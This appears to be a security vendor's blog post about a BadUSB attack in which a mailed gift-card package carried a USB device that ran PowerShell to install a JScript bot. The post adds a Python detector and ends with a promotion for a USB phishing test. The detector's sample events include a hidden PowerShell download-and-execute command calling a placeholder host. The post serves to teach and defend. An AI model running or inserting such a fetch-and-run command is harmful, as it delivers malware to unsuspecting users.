Hospitality Provider the Target of an Old-School BadUSB Social Engineering Attack

Stu Sjouwerman | Mar 26, 2020

In what appears to be a mix of old- and new-school social engineering, an attack spotted in the wild using a USB thumb drive offers us a view into how one company could have become the victim.

One of the oldest forms of modern-day social engineering was the “dropping the malware-laden USB stick in the parking lot” scam. This month, security researchers at Trustwave clued the world in on an attempted USB drive-based scam (referred to as a BadUSB device) on one of their unnamed clients.

Here’s how it went down:

The client was mailed (MAILED!) a BestBuy gift card, a letter (on BestBuy letterhead) thanking them for their business and a USB Drive (which the letter indicated contained a list of items the gift card could be spent on).


Instead of falling for the scam, the client eventually called in Trustwave to investigate. Upon plugging the BadUSB device into a test workstation, a PowerShell script was launched which downloaded a second PowerShell script and a JScript-based malware bot, installed the malware and even displayed a fake message box to explain to the victim why there was no list of items to be purchased with the gift card.


The malware collects a wide range of information about the infected machine, sends it back to the command-and-control (C2) server, and then enters a loop awaiting further instructions from the C2 server.
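As an added example (not code from Trustwave or KnowBe4), the following Python correlates constructed, hypothetical Windows-style endpoint events to flag the chain just described: a USB keyboard (HID) arrival followed within seconds by a PowerShell download cradle that then spawns a script host for the JScript stage. The event schema, field names, host names and URL are assumptions for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (hypothetical schema, not a real Sysmon/EDR format):
# a keyboard HID arrival, a PowerShell download cradle 4 s later, a JScript host
# spawned by that PowerShell, and an unrelated benign PowerShell on another host.
SAMPLE_EVENTS = [
    {"ts": "2020-03-26T10:00:00", "type": "device_arrival", "host": "WS01",
     "class": "HID", "name": "USB Keyboard"},
    {"ts": "2020-03-26T10:00:04", "type": "process_create", "host": "WS01",
     "image": "powershell.exe", "pid": 412, "ppid": 300,
     "cmdline": "powershell -w hidden -c IEX(New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage2')"},
    {"ts": "2020-03-26T10:00:09", "type": "process_create", "host": "WS01",
     "image": "wscript.exe", "pid": 533, "ppid": 412,
     "cmdline": "wscript.exe C:\\Users\\Public\\bot.js"},
    {"ts": "2020-03-26T11:15:00", "type": "process_create", "host": "WS02",
     "image": "powershell.exe", "pid": 900, "ppid": 120,
     "cmdline": "powershell Get-Service"},
]

# Command-line fragments typical of a second-stage download cradle.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_badusb_chain(events, window=timedelta(seconds=30)):
    """Return one alert per PowerShell download cradle that starts within
    `window` of a HID device arrival on the same host; each alert records
    whether that PowerShell went on to spawn a script host (the JScript bot)."""
    alerts = []
    hid_events = [e for e in events if e["type"] == "device_arrival" and e.get("class") == "HID"]
    for hid in hid_events:
        for proc in events:
            if (proc["type"] != "process_create" or proc["host"] != hid["host"]
                    or proc["image"].lower() != "powershell.exe"):
                continue
            delta = _ts(proc) - _ts(hid)
            if not (timedelta(0) <= delta <= window):
                continue
            if not any(m in proc["cmdline"].lower() for m in DOWNLOAD_MARKERS):
                continue
            children = [c for c in events if c["type"] == "process_create"
                        and c["host"] == proc["host"] and c.get("ppid") == proc["pid"]
                        and c["image"].lower() in SCRIPT_HOSTS]
            alerts.append({"host": hid["host"], "powershell_pid": proc["pid"],
                           "seconds_after_hid": int(delta.total_seconds()),
                           "script_host_child": bool(children)})
    return alerts
```

Run against SAMPLE_EVENTS this yields a single alert for WS01 (PowerShell 4 seconds after the keyboard arrival, with a script-host child); the benign PowerShell on WS02 has no preceding HID arrival and no download marker, so it is not flagged.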

This scam is a wonderful example of how simple social engineering, a stolen empty Best Buy gift card, and an inexpensive BadUSB device (which only costs about $7 USD), can be used to infect an organization with malware that can be used to do anything its designers desire in the future.

The question you need to ask yourself is: would your users fall for it?

If so, you need them to be put through continual Security Awareness Training where they can learn about social engineering, the various forms of scams that exist (including ones like this one), and how to avoid becoming a victim of each.

Free USB Security Test

On average 45% of your users will plug in USBs. Find out now what your users' reactions are to unknown USBs, with KnowBe4's new Free USB Security Test. Download our special, "beaconized" file onto any USB drive. Then label the drive with something enticing and drop the drive in an on-site high-traffic area. If an employee picks it up, plugs it into their workstation and opens the file, it will "call home" and report the "fail" to your KnowBe4 console. And for Office documents, if the user also enables macros (!), additional data is tracked and geomapped.

How your free 7-day USB Security Test works:

  • Fill out the form, and immediately...
  • Download "beaconized" Word, Excel or PDF files
  • Copy to any USB Drive, label and drop it
  • Reports on opens and if macros were enabled
  • Takes just a few minutes to set up

Test Your Users

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

https://www.knowbe4.com/usb-security-test
